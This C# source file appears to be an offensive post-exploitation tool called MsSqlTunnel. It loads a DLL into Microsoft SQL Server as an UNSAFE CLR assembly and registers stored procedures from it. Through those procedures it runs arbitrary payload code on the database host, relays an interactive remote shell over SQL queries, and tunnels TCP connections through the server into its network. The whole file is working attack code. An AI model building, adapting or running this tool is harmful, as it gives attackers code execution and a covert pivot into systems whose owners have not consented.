﻿using System;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.IO;
using System.Net.Sockets;
using System.Text;
using System.Threading;

namespace MsSqlTunnel
{
    class Program
    {
        static void Main(string[] args)
        {
            if (args.Length == 0)
            {
                Console.WriteLine("Usage: MsSqlTunnel create");
                Console.WriteLine("       MsSqlTunnel drop");
                Console.WriteLine("       MsSqlTunnel run <payloadfile>");
                Console.WriteLine("       MsSqlTunnel shell");
                Console.WriteLine("       MsSqlTunnel tunnel <listenport> <host> <port>");
                Console.WriteLine();
                Console.WriteLine("Set environment variable DCBS to database connection string to use.");
                return;
            }

            string connectionString = Environment.GetEnvironmentVariable("DBCS");
            // connectionString = @"Data Source=192.168.56.99\SQLEXPRESS;Initial Catalog=xyz;User ID=xyz;Password=xyz123$";
            
            if (connectionString == null)
            {
                Console.Write("Database connection string not found. Please set DBCS environment variable!");
                return;
            }

            using (SqlConnection conn = new SqlConnection(connectionString))
            {
                conn.Open();
                switch (args[0].ToLowerInvariant())
                {
                    case "create":
                        CreateProcedures(conn);
                        break;
                    case "drop":
                        DropProcedures(conn);
                        break;
                    case "run":
                        RunPayload(conn, args[1]);
                        break;
                    case "shell":
                        using (SqlConnection conn2 = new SqlConnection(connectionString))
                        {
                            conn2.Open();
                            TunnelShell(conn, conn2);
                            conn2.Close();
                        }
                        break;
                    case "tunnel":
                        using (SqlConnection conn2 = new SqlConnection(connectionString))
                        {
                            conn2.Open();
                            TunnelTCP(conn, conn2, int.Parse(args[1]), args[2], int.Parse(args[3]));
                            conn2.Close();
                        }
                        break;
                    default:
                        Console.Write("Unsupported command: " + args[0]);
                        break;
                }
            }
        }

        private static void CreateProcedures(SqlConnection conn)
        {
            byte[] dll = File.ReadAllBytes("MsSqlPayload.dll");
            RunSQL(conn, "CREATE ASSEMBLY MsSqlPayload FROM (@data) WITH PERMISSION_SET = UNSAFE", null, dll);
            RunSQL(conn, "CREATE PROCEDURE PayloadRun (@data VARBINARY(4100)) AS EXTERNAL NAME MsSqlPayload.StoredProcedures.Run", null, null);
            RunSQL(conn, "CREATE PROCEDURE PayloadCreate (@port INT) AS EXTERNAL NAME MsSqlPayload.StoredProcedures.[Create]", null, null);
            RunSQL(conn, "CREATE PROCEDURE PayloadRead (@id INT) AS EXTERNAL NAME MsSqlPayload.StoredProcedures.[Read]", null, null);
            RunSQL(conn, "CREATE PROCEDURE PayloadWrite (@id INT, @data VARBINARY(4100)) AS EXTERNAL NAME MsSqlPayload.StoredProcedures.Write", null, null);
        }

        private static void DropProcedures(SqlConnection conn)
        {
            RunSQL(conn, "DROP PROCEDURE PayloadRun", null, null);
            RunSQL(conn, "DROP PROCEDURE PayloadCreate", null, null);
            RunSQL(conn, "DROP PROCEDURE PayloadRead", null, null);
            RunSQL(conn, "DROP PROCEDURE PayloadWrite", null, null);
            RunSQL(conn, "DROP ASSEMBLY mssqlpayload", null, null);
        }

        private static void RunPayload(SqlConnection conn, string filename)
        {
            byte[] code = File.ReadAllBytes(filename);
            RunSQL(conn, "EXEC PayloadRun @data", null, code);
        }

        private static void TunnelShell(SqlConnection conn1, SqlConnection conn2)
        {
            int tunnelid;
            using (SqlCommand cmd = new SqlCommand("EXEC PayloadCreate @port"))
            {
                cmd.Connection = conn2;
                cmd.CommandTimeout = 0;
                cmd.Parameters.AddWithValue("port", 0);
                tunnelid = (int)cmd.ExecuteScalar();
            }
            Thread t = new Thread(() =>
            {
                while (true)
                {
                    byte b = (byte)Console.Read();
                    RunSQL(conn1, "EXEC PayloadWrite @id, @data", tunnelid, new byte[] { b });
                }
            });
            t.IsBackground = true;
            t.Start();
            SqlRead(conn2, tunnelid, data => { Console.Write(Encoding.Default.GetString(data)); });
            Console.Write("[Connection lost]");
        }

        private static void TunnelTCP(SqlConnection conn1, SqlConnection conn2, int listenPort, string host, int port)
        {
            int tunnelid;
            using (SqlCommand cmd = new SqlCommand("EXEC PayloadCreate @port"))
            {
                cmd.CommandTimeout = 0;
                cmd.Connection = conn2;
                cmd.Parameters.AddWithValue("port", listenPort);
                tunnelid = (int)cmd.ExecuteScalar();
            }
            TcpClient c = new TcpClient();
            c.Connect(host, port);
            Stream s = c.GetStream();
            Thread t = new Thread(() =>
            {
                byte[] rbuf = new byte[4096];
                int rlen;
                try
                {
                    while ((rlen = s.Read(rbuf, 0, rbuf.Length)) != 0)
                    {
                        byte[] copy = new byte[rlen];
                        Array.Copy(rbuf, copy, rlen);
                        RunSQL(conn1, "EXEC PayloadWrite @id, @data", tunnelid, copy);
                    }
                }
                catch (IOException) { }
                RunSQL(conn1, "EXEC PayloadWrite @id, NULL", tunnelid, null);
            });
            t.Start();
            SqlRead(conn2, tunnelid, data => { s.Write(data, 0, data.Length); });
            c.Close();
            t.Join();
        }

        private static void RunSQL(SqlConnection conn, string sql, int? id, byte[] data)
        {
            using (SqlCommand cmd = new SqlCommand(sql))
            {
                cmd.Connection = conn;
                if (id != null)
                {
                    cmd.Parameters.AddWithValue("id", id.Value);
                }
                if (data != null)
                {
                    cmd.Parameters.AddWithValue("data", data);
                }
                cmd.ExecuteNonQuery();
            }
        }

        private delegate void ReadCallback(byte[] data);

        private static void SqlRead(SqlConnection conn, int tunnelid, ReadCallback callback)
        {
            using (SqlCommand cmd = new SqlCommand("EXECUTE PayloadRead @id"))
            {
                cmd.Connection = conn;
                cmd.CommandTimeout = 0;
                cmd.Parameters.AddWithValue("id", tunnelid);
                using (SqlDataReader rdr = cmd.ExecuteReader())
                {
                    do
                    {
                        while (rdr.Read())
                        {
                            SqlBinary binary = rdr.GetSqlBinary(0);
                            if (binary.IsNull) break;
                            callback(binary.Value);
                        }
                    }
                    while (rdr.NextResult());
                }
            }
        }
    }
}